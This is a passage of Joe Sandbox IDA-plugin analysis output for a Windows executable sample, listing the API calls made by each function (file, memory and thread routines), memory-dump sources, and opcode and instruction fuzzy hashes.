                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 004045D6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: PathTemp$AttributesFilewsprintf
                                                                    • String ID:
                                                                    • API String ID: 1746483863-0
                                                                    • Opcode ID: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                    • Instruction ID: 733027a3fcd96ec5c8df4ae3473da8ef02d46a04784f0fe1f39aec502691af17
                                                                    • Opcode Fuzzy Hash: 0e4a8cbd59d5c8a173ea11c71d2339e4dceea1800af4b6b4e6d7220fd0c99624
                                                                    • Instruction Fuzzy Hash: C1112772500604FFC701AF55CC84AADB7B8FF84314F10802EF946972E1CB799900CB94
                                                                    APIs
                                                                      • Part of subcall function 004105E9: _CxxThrowException.MSVCRT(?,00417298), ref: 00410603
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,(nA,?,00416DD8), ref: 00412643
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,(nA,?,00416DD8), ref: 0041279B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$ExceptionThrow
                                                                    • String ID: (nA
                                                                    • API String ID: 2803161813-867891557
                                                                    • Opcode ID: a23f4a3e4590838c40bb2731bcc9978bea7517a1840853a56b40fbfce1223ec6
                                                                    • Instruction ID: 0ece9700425cb4d864afba528f8150fdb1f56e7dd499115c8cef0e07f043e1c2
                                                                    • Opcode Fuzzy Hash: a23f4a3e4590838c40bb2731bcc9978bea7517a1840853a56b40fbfce1223ec6
                                                                    • Instruction Fuzzy Hash: A9814B70A00605AFCB24DFA5C591AEEFBF6BF08314F14452EE515E3391D7B8AA90CB58
                                                                    APIs
                                                                    • SysAllocString.OLEAUT32(?), ref: 0040CBC4
                                                                    • _CxxThrowException.MSVCRT(?,00416FBC), ref: 0040CBE7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AllocExceptionStringThrow
                                                                    • String ID: PlA
                                                                    • API String ID: 3773818493-1533977103
                                                                    • Opcode ID: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                    • Instruction ID: 296fbbf4859103af06767512d87f49f38bd905f8065bfdcdd98956010b0ea552
                                                                    • Opcode Fuzzy Hash: 9da6470fb493ce6a5e6bdcff394512404a5483abbe6bbc59635324e60b80df40
                                                                    • Instruction Fuzzy Hash: 54E0ED71600304EADB209F65E8829D6BBF8EF04785710C53FF948DA250E7B9E980C79C
                                                                    APIs
                                                                      • Part of subcall function 0040236F: LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 0040237F
                                                                      • Part of subcall function 0040236F: GetProcAddress.KERNEL32(00000000), ref: 00402386
                                                                      • Part of subcall function 0040236F: GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,004023A5,00405BA0,00419858,00419858), ref: 00402394
                                                                    • ??3@YAXPAX@Z.MSVCRT(00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E21
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E29
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,00405C1F,?,?,?,?,?,?,?,00405C1F), ref: 00403E31
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$AddressInfoLibraryLoadNativeProcSystem
                                                                    • String ID:
                                                                    • API String ID: 1642057587-0
                                                                    • Opcode ID: 572bd86ded921972edbcb4b9d1f3e65da77713091b6bf68aa68be916d146458f
                                                                    • Instruction ID: 921b34b2ca4cae370864143a871e5ac41304b7093d26a65462705394026d5d48
                                                                    • Opcode Fuzzy Hash: 572bd86ded921972edbcb4b9d1f3e65da77713091b6bf68aa68be916d146458f
                                                                    • Instruction Fuzzy Hash: A8515FB2D04109AADF01EFD1CD919FEBB7DAF04309F04406AF511B62C1D7799A4ADB98
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,00419810,ExecuteFile,0000002D,0000002D,?,00406616,?,00419810,00419810), ref: 00401739
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000040), ref: 004017D6
                                                                      • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                      • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                      • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                      • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@FileTime$??3@AttributesSystemlstrlen
                                                                    • String ID: ExecuteFile
                                                                    • API String ID: 1306139538-323923146
                                                                    • Opcode ID: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                    • Instruction ID: 9484230cc67166f2f755b6e2650531b124a09860f62e081dc195098c01fa7d0a
                                                                    • Opcode Fuzzy Hash: 03c1fc4a848cb1bd6dc51e2723fab2d4ca0176e216816c9125f0e1fc3d427f7b
                                                                    • Instruction Fuzzy Hash: 6531E375700204BBCB20ABA5CC89CAFB7B9EFC4705728086FF405E73A1DB799D408628
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E049
                                                                    • memmove.MSVCRT(00000000,?,?,?,?,?,00410D1B,00010000), ref: 0040E063
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00410D1B,00010000), ref: 0040E073
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@memmove
                                                                    • String ID:
                                                                    • API String ID: 3828600508-0
                                                                    • Opcode ID: 8acf0261108fbb4839799140d60bf7db81ea8674b749c97fed008b47ea7385ff
                                                                    • Instruction ID: 4d808faca08bf89b0fd6c24434e0160128b2010f8b4ad61872e4f6e811daac21
                                                                    • Opcode Fuzzy Hash: 8acf0261108fbb4839799140d60bf7db81ea8674b749c97fed008b47ea7385ff
                                                                    • Instruction Fuzzy Hash: 28F08232600720AFD2305F27DD8095BB7A9EBC47153148D3FE5AD92350CAB5E8518659
                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 004026F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID: @
                                                                    • API String ID: 1890195054-2766056989
                                                                    • Opcode ID: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                    • Instruction ID: 06539b43d6f5c2ce11291560a72fbbc8528a2f3b0367cc898c628306ed72bb09
                                                                    • Opcode Fuzzy Hash: 2755d2f4d32b7a33f337b75ab828a694b6e8efe9be06c7f4c0d7d4513a976335
                                                                    • Instruction Fuzzy Hash: 20F0C2309102089ACF19AF70DA9DBAF3BA4BF00348F104A3AD462F72D0D7F8D845864C
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: lA
                                                                    • API String ID: 613200358-262130271
                                                                    • Opcode ID: 057769e26a3b216baade4979d912b87705f9fac977230d9a31cf155ba5458ca5
                                                                    • Instruction ID: be810f4beaf6972e7a5014057c92b7027d0de42a9649241163ddb4af855fb9b0
                                                                    • Opcode Fuzzy Hash: 057769e26a3b216baade4979d912b87705f9fac977230d9a31cf155ba5458ca5
                                                                    • Instruction Fuzzy Hash: 73F01CB26007119BC320EF58D845B87B7E8AF44304B148A3FE48997651E7B8E985CBED
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@H_prolog
                                                                    • String ID:
                                                                    • API String ID: 1329742358-0
                                                                    • Opcode ID: 6223a863a7d7b008d518b8a121c65c26c745086cc40489949b2f9b2ead4f2d5c
                                                                    • Instruction ID: 10f57f22a906aa0b0a42583f003833c21146b94334aab583da89fc310c08d6c6
                                                                    • Opcode Fuzzy Hash: 6223a863a7d7b008d518b8a121c65c26c745086cc40489949b2f9b2ead4f2d5c
                                                                    • Instruction Fuzzy Hash: A5410232804014ABCB15DBA4C989AFE7B34EF06304B1440ABF401776A2DABD5EC9975D
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@
                                                                    • String ID:
                                                                    • API String ID: 1936579350-0
                                                                    • Opcode ID: 1a4b74ded979b4ecf291815d3d982842584d21ec499bcc61b92b2ff60919d255
                                                                    • Instruction ID: d4d9177561ba86130c59ecf769237b2e762d53917a12275e761ebd000d06797d
                                                                    • Opcode Fuzzy Hash: 1a4b74ded979b4ecf291815d3d982842584d21ec499bcc61b92b2ff60919d255
                                                                    • Instruction Fuzzy Hash: 7AF08C36610611ABD338DF29C58186BB3E4EB88355720893FE28ACB2A1DA35A880C754
                                                                    APIs
                                                                    • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 0040251F
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,00402850,00000001,00000020,00402E23,00000000,00000000,00000000,00000020), ref: 00402543
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@
                                                                    • String ID:
                                                                    • API String ID: 1936579350-0
                                                                    • Opcode ID: bf0dca0c46d70b304b8d8584092d60bb7ff45e1102dc1ab57bd53102d0fae494
                                                                    • Instruction ID: ee6e1bd81e6d65453633442f6a1d57c69857676589945f0ce02378b43b8f31e2
                                                                    • Opcode Fuzzy Hash: bf0dca0c46d70b304b8d8584092d60bb7ff45e1102dc1ab57bd53102d0fae494
                                                                    • Instruction Fuzzy Hash: 0DF09035004652AFC3309F29D994843F7E4AF55705720887FE1DAC33A2C674A880C768
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040C914
                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0040C922
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer
                                                                    • String ID:
                                                                    • API String ID: 2976181284-0
                                                                    • Opcode ID: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                    • Instruction ID: 5a685d8d3943d7b2e7289d0006b4b3d46cacc15a83080b067a3dad9829954c10
                                                                    • Opcode Fuzzy Hash: 8b88ea7865465276bf5a21a54c36bc0df87277094e8d6374ce9343fa71539519
                                                                    • Instruction Fuzzy Hash: F7F0DAB5900208FFCB04CF94D9849EE7BB5EF49310B108669F915A73A0D7359E50DB64
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,-00000008,00404A32,?,?,?), ref: 004026A0
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,-00000008,00404A32,?,?,?), ref: 004026A7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 9bdf8e72a7f15760b8fab15500d3dfc93a0e4d3910a8e03da63fda94412c67e1
                                                                    • Instruction ID: 6a7e44d1361fbcc4c06fb61f3001a61fff325a62d5d84498b6a11b5e2c7c739c
                                                                    • Opcode Fuzzy Hash: 9bdf8e72a7f15760b8fab15500d3dfc93a0e4d3910a8e03da63fda94412c67e1
                                                                    • Instruction Fuzzy Hash: BBB0923280C260AEBA3A3E15F9038C967D5EF1023A321856FF089112656E972D92668C
                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040DA2D
                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040DA4C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 3168844106-0
                                                                    • Opcode ID: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                    • Instruction ID: 5d27eff888a04a2a1af920e5c8fe564bbb0a5ef9a93153a65d570a8b15afed72
                                                                    • Opcode Fuzzy Hash: 9f865e1c4fc0fe21fbcef52b0fef9e7314b0768b57200dd69fc44cf09c27d63e
                                                                    • Instruction Fuzzy Hash: ADF01D36600214EBCB119FD5DC08E9ABBA9FF99761F10442AFA41A7260C771E811DFA4
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                    • Instruction ID: d622825666b969e0cf609659fb89c84123d12be518dfc819517b0c3290ecd380
                                                                    • Opcode Fuzzy Hash: 6f44193eaeda355f9b3e97adace56953b8328d331421677c58d82c8f54f080aa
                                                                    • Instruction Fuzzy Hash: 0421713160020ADFCB20EFA6D495AEE7775AF40308F14447EF816AB281DB78ED85CB55
                                                                    APIs
                                                                    • SetFileAttributesW.KERNELBASE(?,?), ref: 00401296
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                    • Instruction ID: 365df7105ab9a04826b78ec900b125106ca9408a1d9c2f09e43ac9e2ec372a14
                                                                    • Opcode Fuzzy Hash: 8c7072cc985fec6293f6a09753beb2e316357da8c48b476863e2be2ee39a59c4
                                                                    • Instruction Fuzzy Hash: 79F05E32504601EFC720AF69D840BA777F5FB88300F08482EE486F25B0D378B881CB59
                                                                    APIs
                                                                      • Part of subcall function 0040C88E: CloseHandle.KERNELBASE(00419858,?,0040C96A,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4,?,00419858,00000003,00000080), ref: 0040C899
                                                                    • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00000000,?,0040C9B2,[@,80000000,?,?,?,0040C9D4), ref: 0040C981
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateFileHandle
                                                                    • String ID:
                                                                    • API String ID: 3498533004-0
                                                                    • Opcode ID: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                    • Instruction ID: bfcfdadf78b221de7b75783111638f87db2d9d80aed60170162fb1aa82d728bf
                                                                    • Opcode Fuzzy Hash: a19757ce7e5ccf613119123a5b3edc374ed6791f117f5654b3e73f372b86812c
                                                                    • Instruction Fuzzy Hash: 3BE08637000219BBCF115FA4EC41BCE3F55AF097A0F144626FA14A61F0D772C971AB99
                                                                    APIs
                                                                    • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040D0BE,00000001,00419858,00419858,0041549C,?,00405599,?,?), ref: 0040CAC3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite
                                                                    • String ID:
                                                                    • API String ID: 3934441357-0
                                                                    • Opcode ID: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                    • Instruction ID: 88aaa84a90d32b64ed1f6dd0793a6e1d7fbd9e1969eb2b8b5a1cb2f912c455e2
                                                                    • Opcode Fuzzy Hash: 1dc2ab1047e8fbb08a34da3cb10be8d6ff10d3f1f1ca0bc0f854986ee0a730da
                                                                    • Instruction Fuzzy Hash: 55E0C275640208FFDB01CF95C841BDE7BB9AB48354F10C169E9189A260D3799A50DF54
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: _beginthreadex
                                                                    • String ID:
                                                                    • API String ID: 3014514943-0
                                                                    • Opcode ID: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                    • Instruction ID: 033854197d412f734f15e9e19b3d909a116f00c1e253b1452bfc5409eef9a5ef
                                                                    • Opcode Fuzzy Hash: 0a96b3d3168017e36cebe01d4e37acbbe9c54d2facf36fb98624370b6d5ca005
                                                                    • Instruction Fuzzy Hash: 97D017F6900208BFCF01EFA0CC45CEB3BADEB08204B004464B905C2110E671DA109BA0
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040C9FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
